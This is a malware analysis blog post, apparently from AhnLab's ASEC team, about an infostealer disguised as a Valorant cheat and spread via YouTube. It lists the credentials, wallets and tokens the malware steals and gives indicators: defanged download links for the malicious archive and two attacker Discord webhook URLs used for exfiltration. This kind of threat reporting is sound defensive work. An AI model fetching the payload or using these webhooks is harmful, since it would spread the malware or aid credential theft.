The ASEC analysis team has recently discovered an infostealer that is being distributed via YouTube. The attacker disguised the malware as a game hack for Valorant, and uploaded the following video with the download link for the malware, then guided the user to turn off the anti-malware program.
The team has introduced another case of distribution disguised as a game hack or crack via YouTube in a previous ASEC blog post.
When users click the link to download the game hack program for Valorant, the following download page is displayed.
- Download page URL: hxxps://anonfiles[.]com/J0b03cKexf
- File download URL: hxxps://cdn-149.anonfiles[.]com/J0b03cKexf/bfb807d9-1646204724/Pluto%20Valornt%20cheat.rar
The downloaded compressed file “Pluto Valornt cheat.rar” contains an executable named “Cheat installer.exe”. Although its name appears to be of a game hack, it is actually an infostealer.
When the malware is executed, it collects basic information of the infected system as well as various user credentials such as screenshots, user account credentials saved to web browsers and VPN client programs, cryptocurrency wallet files, Discord tokens, and Telegram session files. The following is a list of targets to be stolen:
1. Basic information
– Computer name, user name, IP address, Windows version, system information (CPU, GPU, RAM, etc.), and list of processes
2. Web broswer
2.1. List of targeted web browsers
– Chrome, Edge, and Firefox
2.2. Stolen information
– Passwords, credit card numbers, AutoFill forms, bookmarks, and cookies
3. Cryptocurrency wallet file
– Armory, AtomicWallet, BitcoinCore, Bytecoin, DashCore, Electrum, Ethereum, LitecoinCore, Monero, Exodus, Zcash, and Jaxx
4. VPN client account credentials
4.1. List of targeted VPN clients
– ProtonVPN, OpenVPN, and NordVPN
4.2. Stolen information
– Account credentials
– Host address, port number, user name, and passwords
5.2. Minecraft VimeWorld
– Account credentials, level, ranking, etc.
– Client session information
– Client session information
– Token information
The attacker creates a compressed file of the stolen information above and sends it to themselves via Discord WebHooks API.
Using the WebHook API allows the malware to send the data and notification to a specific Discord server. In other words, the malware attaches the compressed file of the stolen information via the following WebHook URL to request POST, and the attacker can receive the stolen information and notification in the Discord server. The malware uses the following two WebHooks URLs of the attacker.
- WebHook URL : hxxps://discordapp[.]com/api/webhooks/947181971019292714/gXE5T4ZQQF0yGOhuBSDhTkFXB0ut9ai71IZmOFvsdIaznalhyvQP0h45xCss-8W7KQCo
UserAgent : log
UserName : log
- WebHook URL : hxxps://discord[.]com/api/webhooks/940299131098890301/RU4T0D4gNAYM0BZkAMMKQRwGBORfHiJUJ5lJ20Gd-s2yCIX9lXCbyB6yZ6zHUA5B-H42
UserAgent : logloglog91
UserName : logloglog91
A case of stealing information using Discord WebHook API was introduced in a previous ASEC blog post.
As explained in this post, malware can be installed through various platforms, therefore, users should refrain from downloading illegal programs and using suspicious websites or P2P and use genuine software at all times. Also, V3 should be updated to the latest version so that malware infection can be prevented.
– Malware/Win.AY.C4396023 (2021.03.29.01)
– Download page: hxxps://anonfiles[.]com/J0b03cKexf
– Malicious compressed file download URL: hxxps://cdn-149.anonfiles[.]com/J0b03cKexf/bfb807d9-1646204724/Pluto%20Valornt%20cheat.rar
Discord WebHooks URL
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.